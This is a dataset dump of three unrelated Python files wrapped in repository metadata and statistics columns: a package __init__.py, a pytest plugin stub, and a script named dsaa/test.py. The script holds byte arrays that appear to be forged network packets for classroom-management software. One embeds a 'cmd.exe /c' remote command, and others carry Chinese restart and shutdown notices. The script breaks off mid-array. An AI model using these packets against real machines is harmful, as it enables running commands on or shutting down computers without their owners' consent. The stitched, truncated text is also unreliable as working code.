6cfa06ed2b764471382ebf94d40af867f10433bb
|
[
"MIT"
] | 45
|
2021-01-28T04:12:21.000Z
|
2022-02-24T13:15:50.000Z
|
matilda/fundamental_analysis/equity_valuation_models/__init__.py
|
AlainDaccache/Quantropy
|
6cfa06ed2b764471382ebf94d40af867f10433bb
|
[
"MIT"
] | 32
|
2021-03-02T18:45:16.000Z
|
2022-03-12T00:53:10.000Z
|
matilda/fundamental_analysis/equity_valuation_models/__init__.py
|
AlainDaccache/Quantropy
|
6cfa06ed2b764471382ebf94d40af867f10433bb
|
[
"MIT"
] | 10
|
2020-12-25T15:02:40.000Z
|
2021-12-30T11:40:15.000Z
|
from matilda.fundamental_analysis.equity_valuation_models.cost_of_capital import *
from matilda.fundamental_analysis.equity_valuation_models.absolute_valuation_modeling import *
from matilda.fundamental_analysis.equity_valuation_models.time_value_of_money import *
| 66.25
| 94
| 0.909434
| 34
| 265
| 6.617647
| 0.470588
| 0.146667
| 0.293333
| 0.4
| 0.733333
| 0.733333
| 0.733333
| 0.506667
| 0
| 0
| 0
| 0
| 0.045283
| 265
| 3
| 95
| 88.333333
| 0.889328
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
81b27c4a4da0cb91dc7b9304f5cde70b9a998fc0
| 58
|
py
|
Python
|
httpfaux/pytest_plugin.py
|
symonk/httpfaux
|
1b19f65a14656268a83488a14dd37b6ce78dc4d2
|
[
"Apache-2.0"
] | null | null | null |
httpfaux/pytest_plugin.py
|
symonk/httpfaux
|
1b19f65a14656268a83488a14dd37b6ce78dc4d2
|
[
"Apache-2.0"
] | null | null | null |
httpfaux/pytest_plugin.py
|
symonk/httpfaux
|
1b19f65a14656268a83488a14dd37b6ce78dc4d2
|
[
"Apache-2.0"
] | null | null | null |
# Re-export pytest's hookimpl marker for plugin hook implementations.
# (The original file imported the same name twice; the redundant duplicate
# import has been removed — the module's namespace is unchanged.)
from pytest import hookimpl  # noqa: F401
| 11.6
| 27
| 0.827586
| 8
| 58
| 6
| 0.5
| 0.416667
| 0.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 58
| 4
| 28
| 14.5
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
81cab2fc806660bae05fb98334355388a7b6b886
| 25,562
|
py
|
Python
|
dsaa/test.py
|
ntdgy/python_study
|
c3511846a89ea72418937de4cc3edf1595a46ec5
|
[
"MIT"
] | null | null | null |
dsaa/test.py
|
ntdgy/python_study
|
c3511846a89ea72418937de4cc3edf1595a46ec5
|
[
"MIT"
] | null | null | null |
dsaa/test.py
|
ntdgy/python_study
|
c3511846a89ea72418937de4cc3edf1595a46ec5
|
[
"MIT"
] | null | null | null |
import sys
import socket
import random
import argparse
from re import compile
from time import sleep
from struct import pack
from os import popen, system
from multiprocessing import Pool
store = [
[0x44, 0x4d, 0x4f, 0x43, 0x00, 0x00, 0x01, 0x00, 0x9e, 0x03, 0x00, 0x00, 0x10, 0x41, 0xaf, 0xfb, 0xa0, 0xe7, 0x52,
0x40, 0x91,
0xdc, 0x27, 0xa3, 0xb6, 0xf9, 0x29, 0x2e, 0x20, 0x4e, 0x00, 0x00, 0xc0, 0xa8, 0x50, 0x81, 0x91, 0x03, 0x00, 0x00,
0x91, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00],
[0x44, 0x4d, 0x4f, 0x43, 0x00, 0x00, 0x01, 0x00, 0x6e, 0x03, 0x00, 0x00, 0x5b, 0x68, 0x2b, 0x25, 0x6f, 0x61, 0x64,
0x4d, 0xa7, 0x92, 0xf0, 0x47, 0x00, 0xc5, 0xa4, 0x0e, 0x20, 0x4e, 0x00, 0x00, 0xc0, 0xa8, 0x64, 0x86, 0x61, 0x03,
0x00, 0x00, 0x61, 0x03, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00,
0x77, 0x00, 0x73, 0x00, 0x5c, 0x00, 0x73, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6d, 0x00, 0x33,
0x00, 0x32, 0x00, 0x5c, 0x00, 0x63, 0x00, 0x6d, 0x00, 0x64, 0x00, 0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x2f, 0x00, 0x63, 0x00, 0x20, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00],
[0x44, 0x4d, 0x4f, 0x43, 0x00, 0x00, 0x01, 0x00, 0x2a, 0x02, 0x00, 0x00, 0xbf, 0x40, 0x22, 0x4e, 0x57, 0x2d, 0x3e,
0x4f, 0x9b, 0x6f, 0xc1, 0x8d, 0xe1, 0xeb, 0x4f, 0x62, 0x20, 0x4e, 0x00, 0x00, 0xc0, 0xa8, 0x50, 0x81, 0x1d, 0x02,
0x00, 0x00, 0x1d, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x10, 0x0f,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x59, 0x65, 0x08, 0x5e, 0x06, 0x5c, 0xcd, 0x91,
0x2f, 0x54, 0xa8, 0x60, 0x84, 0x76, 0xa1, 0x8b, 0x97, 0x7b, 0x3a, 0x67, 0x02, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00],
[0x44, 0x4d, 0x4f, 0x43, 0x00, 0x00, 0x01, 0x00, 0x2a, 0x02, 0x00, 0x00, 0xc8, 0xe3, 0x97, 0xfd, 0xc0, 0xb5, 0x9f,
0x45, 0x87, 0x72, 0x05, 0xbd, 0x4e, 0x46, 0xa8, 0x96, 0x20, 0x4e, 0x00, 0x00, 0xc0, 0xa8, 0x50, 0x81, 0x1d, 0x02,
0x00, 0x00, 0x1d, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x10, 0x0f,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x59, 0x65, 0x08, 0x5e, 0x06, 0x5c, 0x73, 0x51,
0xed, 0x95, 0xa8, 0x60, 0x84, 0x76, 0xa1, 0x8b, 0x97, 0x7b, 0x3a, 0x67, 0x02, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
